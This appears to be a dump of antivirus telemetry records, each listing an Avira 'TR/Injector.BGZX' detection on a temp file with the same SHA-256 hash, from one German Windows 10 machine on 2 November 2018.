  Row(detection=Row(filename='avscan-20181102-055616-fb4d539c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055616-FB4D539C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054724-be2170f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054724-BE2170F2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054518-73256093', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054518-73256093', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055003-1ceeb169', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055003-1CEEB169', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055636-078bfc55', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055636-078BFC55', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053232-aa8caa97', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053232-AA8CAA97', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052811-0f70fa08', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052811-0F70FA08', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052831-1b47a525', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052831-1B47A525', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055645-0caad53c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055645-0CAAD53C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054702-b185fd44', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054702-B185FD44', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054539-7fed7e84', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054539-7FED7E84', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052832-1b837b6e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052832-1B837B6E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054754-d083f6ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054754-D083F6AC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054541-810c4022', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054541-810C4022', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052831-1b4f0e07', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052831-1B4F0E07', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053924-a06e172e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053924-A06E172E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051528-485ed42f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051528-485ED42F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055642-0b0054fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055642-0B0054FB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054538-7f1a11ca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054538-7F1A11CA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052812-0fc4f4c0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052812-0FC4F4C0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053915-9ac6d6c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053915-9AC6D6C6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054508-6d9645ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054508-6D9645AC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054747-cc52b3dc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054747-CC52B3DC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054538-7f46cab4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054538-7F46CAB4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054748-ccd14726', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054748-CCD14726', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055626-0186c0a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055626-0186C0A6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053212-9e938243', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053212-9E938243', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055633-05dee590', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055633-05DEE590', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055642-0ae9a283', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055642-0AE9A283', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054521-7526983a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054521-7526983A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053221-a462845e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053221-A462845E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055615-fae622c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055615-FAE622C7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052803-0a83fa5a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052803-0A83FA5A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054723-be03a46d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054723-BE03A46D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055802-3a9c8036', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055802-3A9C8036', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054751-ce6ce0ae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054751-CE6CE0AE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055802-3ac558ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055802-3AC558AC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052804-0ab04657', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052804-0AB04657', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055614-fa862a35', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055614-FA862A35', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055634-05f14684', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055634-05F14684', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054520-7495084b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054520-7495084B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054751-ce56df55', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054751-CE56DF55', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053257-b99ffd96', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053257-B99FFD96', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054753-cfd904cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054753-CFD904CB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054550-8632e791', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054550-8632E791', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054549-860abad0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054549-860ABAD0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055611-f84c4427', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055611-F84C4427', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055632-04e9d709', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055632-04E9D709', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054549-85a31e5e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054549-85A31E5E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052820-14637a67', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052820-14637A67', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054523-7660dd49', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054523-7660DD49', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053942-ab35beb2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053942-AB35BEB2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054717-ba4b04f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054717-BA4B04F6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054743-c994a8c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054743-C994A8C6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053936-a79e4d47', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053936-A79E4D47', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:35Z'), dt=datetime.date(2018, 11, 2)),
